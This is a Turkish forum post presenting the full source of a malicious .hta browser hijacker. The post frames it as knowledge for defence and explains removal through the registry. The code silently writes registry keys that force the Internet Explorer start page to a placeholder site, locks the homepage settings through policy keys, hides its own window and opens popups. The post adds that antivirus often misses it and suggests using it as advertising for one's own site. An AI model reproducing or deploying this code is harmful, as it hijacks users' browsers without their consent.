|
Çevrimdışı
Kullanıcıların profil bilgileri misafirlere kapatılmıştır.
|
İnternet Sayfası Kitlendi
Bi Savunma veya Onarma için öncelikle nasıl yapıldığını öğrenmek lazım
İnternette gezinirken kendi kendine bi dosya indirdiğini veya oto .js veya spead olarak yediniz olmuştur. işte .hta dosyası
<html><head>
<hta:application id=hta_note_id
applicationName=hta_note_name
showInTaskBar=no
caption=no
innerBorder=no
selection=no
scroll=no
contextmenu=no />
<script language=javascript>
window.resizeTo(0, 0);
window.moveTo(0, 0);
</script>
<SCRIPT language=vbs>
self.MoveTo 0, 0
Set shell = CreateObject("WScript.Shell")
shell.regwrite "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersio n\\URL\\Prefixes\\mirc","http://www.xxxxxxxxxxx.com","REG_SZ"
shell.regwrite "HKLM\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\\\Start Page", "http://www.xxxxxxxxxxx.com","REG_SZ"
shell.regwrite "HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\\\Start Page", "http://www.xxxxxxxxxxx.com","REG_SZ"
self.Close
</SCRIPT>
<script language="JavaScript">
<!--
function FP_openNewWindow(w,h,nav,loc,sts,menu,scroll,resiz e,name,url) {//v1.0
var windowProperties=’’; if(nav==false) windowProperties+=’toolbar=no,’; else
windowProperties+=’toolbar=yes,’; if(loc==false) windowProperties+=’location=no,’;
else windowProperties+=’location=yes,’; if(sts==false) windowProperties+=’status=no,’;
else windowProperties+=’status=yes,’; if(menu==false) windowProperties+=’menubar=no,’;
else windowProperties+=’menubar=yes,’; if(scroll==false) windowProperties+=’scrollbars=no,’;
else windowProperties+=’scrollbars=yes,’; if(resize==false) windowProperties+=’resizable=no,’;
else windowProperties+=’resizable=yes,’; if(w!="") windowProperties+=’width=’+w+’,’;
if(h!="") windowProperties+=’height=’+h; if(windowProperties!="") {
if( windowProperties.charAt(windowProperties.length-1)==’,’)
windowProperties=windowProperties.substring(0,wind owProperties.length-1); }
window.open(url,name,windowProperties);
}
// -->
</script>
</head>
<bOdy onbeforeunload="FP_openNewWindow(’1024’, ’768’, false, false, false, false, true, false, ’Duyuru’, /*href*/’http://www.xxxxxxxxxxx.com’)">
</bOdy>
</html>
Kodu gördüğünüz Kayıt defterinden Regedit yani bu girdileri temizleyerek basit yoldan yapabiliriz.Bir çok antivirüs bunu virüs olarak algılamıyor temizlemiyor . veya olur ya internet siten olur güzel bi reklam olur 
__________________
Atomun Parçalayabilirim ama İnsan Önyargısını Parçalayamam
-Albert Einstein-
|
25.05.2011, 10:12
